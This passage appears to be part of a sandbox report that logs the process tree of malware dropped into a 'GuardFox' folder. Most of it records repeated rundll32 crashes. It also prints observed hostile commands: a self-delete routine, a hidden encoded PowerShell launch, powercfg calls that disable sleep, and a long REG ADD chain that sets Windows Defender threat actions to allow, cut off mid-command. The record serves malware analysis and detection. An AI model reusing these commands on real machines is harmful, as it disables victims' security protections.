      4⤵
      PID:3768
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3768 -s 1700
        5⤵
        Program crash
        
        PID:2548
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1644
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 1696
        5⤵
        Program crash
        
        PID:6052
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5904
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5904 -s 1684
        5⤵
        Program crash
        
        PID:2244
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:6036
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6036 -s 1688
        5⤵
        Program crash
        
        PID:1936
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5492
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 1676
        5⤵
        Program crash
        
        PID:2520
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 1680
        5⤵
        Program crash
        
        PID:1496
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:6100
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6100 -s 1708
        5⤵
        Program crash
        
        PID:5936
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5452
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5452 -s 1680
        5⤵
        Program crash
        
        PID:5676
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:184
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5928
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 1692
        5⤵
        Program crash
        
        PID:652
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3520
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1436
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5580
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 1684
        5⤵
        Program crash
        
        PID:5824
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5888
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 1692
        5⤵
        Program crash
        
        PID:1880
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5480
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 1696
        5⤵
        Program crash
        
        PID:5560
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2992
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 1676
        5⤵
        Program crash
        
        PID:6032
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5848 -s 1692
        5⤵
        Program crash
        
        PID:3844
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:464
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5732
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 1700
        5⤵
        Program crash
        
        PID:4580
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3584
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 1700
        5⤵
        Program crash
        
        PID:6124
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3436
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 1684
        5⤵
        Program crash
        
        PID:2916
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3696
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3696 -s 1696
        5⤵
        Program crash
        
        PID:1052
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1328
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1328 -s 1692
        5⤵
        Program crash
        
        PID:5388
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4460
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 1692
        5⤵
        Program crash
        
        PID:6028
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5224
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4896
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4896 -s 1700
        5⤵
        Program crash
        
        PID:2884
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4500
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 1680
        5⤵
        Program crash
        
        PID:2184
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5480
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 1692
        5⤵
        Program crash
        
        PID:3756
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1960
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 1696
        5⤵
        Program crash
        
        PID:860
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4076
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1696
        5⤵
        Program crash
        
        PID:1140
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4404
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4404 -s 1692
        5⤵
        Program crash
        
        PID:1128
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5508
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 1696
        5⤵
        Program crash
        
        PID:1696
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4012
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1700
        5⤵
        Program crash
        
        PID:5164
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4624
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2912
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1696
        5⤵
        Program crash
        
        PID:4024
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5984
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 1676
        5⤵
        Program crash
        
        PID:5740
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1884
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 1696
        5⤵
        Program crash
        
        PID:3632
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5316
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 1696
        5⤵
        Program crash
        
        PID:2472
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3068
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4800
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4800 -s 1696
        5⤵
        Program crash
        
        PID:3904
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1112
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1688
        5⤵
        Program crash
        
        PID:4076
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 1684
        5⤵
        Program crash
        
        PID:4404
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2872
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2872 -s 1696
        5⤵
        Program crash
        
        PID:1588
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3544
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 1692
        5⤵
        Program crash
        
        PID:3232
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3352
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 1696
        5⤵
        Program crash
        
        PID:3236
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3716
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 1692
        5⤵
        Program crash
        
        PID:2912
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4500
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 1676
        5⤵
        Program crash
        
        PID:4776
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1892
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1892 -s 1692
        5⤵
        Program crash
        
        PID:1680
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5040
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1700
        5⤵
        Program crash
        
        PID:4532
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:544
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 544 -s 1684
        5⤵
        Program crash
        
        PID:3012
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5552
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2220
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 1688
        5⤵
        Program crash
        
        PID:8
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:852
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 1704
        5⤵
        Program crash
        
        PID:996
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:388
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 388 -s 1704
        5⤵
        Program crash
        
        PID:1272
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4640
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 1680
        5⤵
        Program crash
        
        PID:5292
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3232
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 1700
        5⤵
        Program crash
        
        PID:2672
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3236
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 1684
        5⤵
        Program crash
        
        PID:3444
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5244
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2236
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2236 -s 1700
        5⤵
        Program crash
        
        PID:5620
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:692
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 692 -s 1696
        5⤵
        Program crash
        
        PID:5932
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4744
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 1684
        5⤵
        
        PID:3172
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2360
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 1688
        5⤵
        
        PID:2212
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5080
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:6016
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 1688
        5⤵
        
        PID:1816
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3176
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4232
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1528
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 1692
        5⤵
        
        PID:3392
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4856
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4856 -s 1704
        5⤵
        
        PID:5904
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5104
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4516
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 1696
        5⤵
        
        PID:4792
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:444
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 1688
        5⤵
        
        PID:4728
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5416
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:1404
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:2128
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2128 -s 1696
        5⤵
        
        PID:1936
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:4924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4924 -s 1680
        5⤵
        
        PID:864
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:3128
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe
      4⤵
      PID:5056
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Documents\GuardFox\oI1ZPB2vxSetVpZWfFiI6Wgi.exe"
    3⤵
    PID:4608
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 3
      4⤵
      Runs ping.exe
      PID:5304
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 856
    3⤵
    - Program crash
    PID:4448
- C:\Users\Admin\Documents\GuardFox\otr_2ge4eomGQQmUEl_yFDKI.exe
  "C:\Users\Admin\Documents\GuardFox\otr_2ge4eomGQQmUEl_yFDKI.exe"
  2⤵
  - Executes dropped EXE
  PID:1544
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
    3⤵
    PID:2836
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 372
      4⤵
      Program crash
      PID:1892
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 1028
    3⤵
    - Program crash
    PID:1936
- C:\Users\Admin\Documents\GuardFox\ASo1Xru8VS6Xfyo5j8fzoFUR.exe
  "C:\Users\Admin\Documents\GuardFox\ASo1Xru8VS6Xfyo5j8fzoFUR.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1816
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3020
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2044
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:1036
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 584
      4⤵
      Program crash
      PID:3232
- C:\Users\Admin\Documents\GuardFox\k80_0TvoDvIvtBz67zMxLD0b.exe
  "C:\Users\Admin\Documents\GuardFox\k80_0TvoDvIvtBz67zMxLD0b.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2600
- C:\Users\Admin\Documents\GuardFox\_kwqjZC3zYczCTpbpeL0J3HT.exe
  "C:\Users\Admin\Documents\GuardFox\_kwqjZC3zYczCTpbpeL0J3HT.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4792
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1112

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3940

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3004 -ip 3004
1⤵
PID:2020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1036 -ip 1036
1⤵
PID:4280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 688 -ip 688
1⤵
PID:5272

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6036 -ip 6036
1⤵
PID:1732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5360
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:1832

C:\ProgramData\jndraacsywhc\todymdgvwmgb.exe
C:\ProgramData\jndraacsywhc\todymdgvwmgb.exe
1⤵
PID:5348
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:2408
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5684
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:4896
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4768
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:3264
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:5400
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4396
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:5460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1856 -ip 1856
1⤵
PID:3096

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1544 -ip 1544
1⤵
PID:688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2836 -ip 2836
1⤵
PID:5228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5736 -ip 5736
1⤵
PID:5128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 5688 -ip 5688
1⤵
PID:1860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5868

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5848 -ip 5848
1⤵
PID:4812

C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\QlvXnnUJUMNwlEU\JgZkRLp.exe
C:\Users\Admin\AppData\Local\Temp\wkyAbHSgWNeOOmoZJ\QlvXnnUJUMNwlEU\JgZkRLp.exe eu /xosite_idMQk 525403 /S
1⤵
PID:4728
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD 